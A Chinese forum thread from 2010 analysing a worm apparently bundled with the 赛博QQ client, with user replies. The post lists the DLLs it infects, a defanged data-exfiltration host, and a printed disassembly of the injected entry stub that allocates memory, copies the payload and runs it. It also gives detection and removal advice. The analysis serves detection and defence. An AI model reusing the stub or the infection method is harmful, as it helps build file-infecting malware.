切换到宽版
  • 5136阅读
  • 8回复

[软件交流]Worm.Spawn.SaiBo-赛博QQ感染众多软件[高危] 附专杀工具 [复制链接]

上一主题 下一主题
离线a-new
 

只看楼主 倒序阅读 使用道具 楼主  发表于: 2010-04-22
赛博QQ可能很多人用,它拥有可以显示好友ip等功能,但是附加了很多垃圾,比如锁定用户主页,更不为人知的是它还是一个蠕虫,会感染你常用的软件,防止用户删除,生成C:\WINDOWS\system32\bserveth.dat这个文件,将用户数据发送到指定网站hxxt://support.hao8684.cn


Worm.Spawn.SaiBo 从感染程序里看出作者编写源码的路径是:d:\Program\Soho\Worm\Spawn\Release\spawn.pdb,从而我借助作者的信息, 我给它命了这个名.


赛博QQ主要会感染以下文件:

ttpcomm.dll 千千静听

BasicCtrlDll.dll QQ

Program\BHOStub.dll 迅雷

mps.dll 暴风影音

uibrowser.dll 阿里旺旺

uxcontacts.dll MSN

AvatarX.ocx 飞信


  1. SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  2. \Microsoft\Internet Explorer\Quick Launch


赛博QQ启动后会向Explorer.exe注入代码执行,Explorer.exe此时就会通过上面的启动项和路径判断是否有上述文件,如果有就会去感染这些文件,从文件中就可以清楚的看到被感染的文件都是一些常用的软件,所以一般用户很难清除木马,怎么判断你是否被感染了?一个简单的办法,如果你装了赛博QQ,你可以看看你QQ目录下的BasicCtrlDll.dll文件数字签名是否正常,如果不正常,那么就危险了,再看看被感染文件的代码,也很容易看出被感染了,由于之前我为了去除赛博QQ的主页锁定的广告功能,调试过赛博QQ的主程序DLL,很了解它程序解码、反调试和代码风格等,被感染文件入口代码如下:

  1. 100AF400 > $ 8B4424 08 mov eax,dword ptr ss:[esp+8] ; 被感染文件入口点
  2. 100AF404 . 3C 01 cmp al,1
  3. 100AF406 . 74 04 je short mps.100AF40C
  4. 100AF408 . 3C 05 cmp al,5
  5. 100AF40A . 7C 52 jl short mps.100AF45E
  6. 100AF40C > 56 push esi
  7. 100AF40D . 57 push edi
  8. 100AF40E . E8 02000000 call mps.100AF415
  9. 100AF413 . CC int3
  10. 100AF414 . CC int3
  11. 100AF415 $ 5E pop esi
  12. 100AF416 . 8D86 D91B0700 lea eax,dword ptr ds:[esi+71BD9]
  13. 100AF41C . 50 push eax
  14. 100AF41D . 8B86 510D0000 mov eax,dword ptr ds:[esi+D51]
  15. 100AF423 . FFD0 call eax ; kernel32.GetModuleHandleA
  16. 100AF425 . 8D8E C51B0700 lea ecx,dword ptr ds:[esi+71BC5]
  17. 100AF42B . 51 push ecx
  18. 100AF42C . 50 push eax
  19. 100AF42D . 8B86 450D0000 mov eax,dword ptr ds:[esi+D45]
  20. 100AF433 . FFD0 call eax ; kernel32.GetProcAddress
  21. 100AF435 . 85C0 test eax,eax
  22. 100AF437 . 74 25 je short mps.100AF45E
  23. 100AF439 . BF 00700100 mov edi,17000
  24. 100AF43E . 6A 40 push 40
  25. 100AF440 . 68 00100000 push 1000
  26. 100AF445 . 57 push edi
  27. 100AF446 . 6A 00 push 0
  28. 100AF448 . FFD0 call eax ; kernel32.VirtualAlloc
  29. 100AF44A . 85C0 test eax,eax
  30. 100AF44C .^ 74 86 je short mps.100AF3D4
  31. 100AF44E . 8BCF mov ecx,edi
  32. 100AF450 . 8BF8 mov edi,eax
  33. 100AF452 . 8DB6 EDAB0500 lea esi,dword ptr ds:[esi+5ABED]
  34. 100AF458 . F3:A4 rep movs byte ptr es:[edi],byte ptr ds:[esi]
  35. 100AF45A . FFD0 call eax ; 跳向木马的执行代码
  36. 100AF45C . 5F pop edi
  37. 100AF45D . 5E pop esi
  38. 100AF45E >^ E9 2273FFFF jmp mps.100A6785 ; 跳向程序原始入口点


从入口感染代码很容易看出,被感染的文件入口会先执行一段上面的代码,用来执行感染程序的dll

  1. 100AF45A . FFD0 call eax


从这里进去以后,如果你跟踪过赛博主程序的dll,你会很容易跟踪出来解码的代码和风格和赛博主程序dll是完全相同的,感染方式比较简单,修改入口代码,增加程序最后一个区段大小用来写入感染代码,具体的过程不在赘述,有兴趣的同学可以详细跟踪下,如果你被感染了,可以先删除上面所有可能被感染的文件,重装即可,欢迎大家指出错误发表自己的见解,也希望各大厂商能尽快查杀此蠕虫!



From:

LCG
吾爱破解论坛
http://www.52pojie.cn
[ 此帖被a-new在2010-04-23 17:58重新编辑 ]
附件: SaiboKiller.rar (47 K) 下载次数:0
离线foxhug

只看该作者 1楼 发表于: 2010-04-22
不是吧 很危险啊
离线jsyzbyyhj

只看该作者 2楼 发表于: 2010-04-22
好危险,幸好我只用飘云
离线hanyao

只看该作者 3楼 发表于: 2010-04-22
引用第3楼448571511于2010-04-22 15:50发表的 :
楼主你最好把这贴发到赛博论坛啦!

要是这样的 赛博肯定会给个满意答案的,呵呵
鄙视TX,资源共享,支持破解!
无奈的呻吟,坚持最后一线希望!
离线366922498

只看该作者 4楼 发表于: 2010-04-22
还是飘云安全。
专业核弹头翻新,改装,潜艇抛光,喷漆.回收二手航母,大修核反应堆,拆洗导弹发动机... 低价转让09年产爱国者PAC-3,白杨M,发现者号航天飞机,2手神六,及高中低档
离线waisjs
只看该作者 5楼 发表于: 2010-04-22
不用赛博、、太无赖了那个垃圾软件
离线radiolyl

只看该作者 6楼 发表于: 2010-04-23
无赖从来不用,也不准用
离线waitlife

只看该作者 7楼 发表于: 2010-04-23
现在没有使用了
快速回复
限100 字节
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
 
上一个 下一个